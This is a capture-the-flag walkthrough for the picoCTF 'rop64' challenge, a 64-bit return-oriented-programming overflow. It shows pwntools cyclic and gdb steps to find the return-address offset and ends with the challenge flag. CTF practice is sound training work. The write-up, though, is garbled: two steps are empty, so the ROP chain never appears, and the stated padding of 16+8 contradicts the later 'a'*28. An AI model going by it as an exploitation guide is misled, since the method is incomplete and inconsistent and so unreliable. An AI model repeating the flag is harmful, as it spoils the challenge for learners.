Comment on page
rop64
Time for the classic ROP in 64-bit. Can you exploit this program to get a flag? You can find the program in /problems/rop64_0_4c66bec7dba72276ffa01e0ad2d6ec8f on the shell server. Source.
- 1.Get Padding
- 1.Run
python2 -c "from pwn import *; print cyclic(1000, n=8)" > fuzz.in
- 2.Start program in gdb (preferably with pwndbg extension) and run
r < fuzz.in
to start thenx $rbp
to get0x6161616161616163: Cannot access memory at address 0x6161616161616163
- 3.Run
python2 -c "from pwn import *; print cyclic_find(0x6161616161616163, n=8)"
to get padding of16
- 4.Add 8 to padding because right after
16
is the "saved frame/base pointer" (which is 8 bytes because 64 bit program) and we want to modify the "saved return address" which is the next address in the stack. (More Info) - 5.So padding is
'a'*(16+8)
- 2.
- 3.Paste in padding of
'a'*28
- 4.
- 5.Run
cat flag.txt
in the shell that spawns
picoCTF{rOp_t0_b1n_sH_w1tH_n3w_g4dg3t5_d4b7a298}
Last modified 2yr ago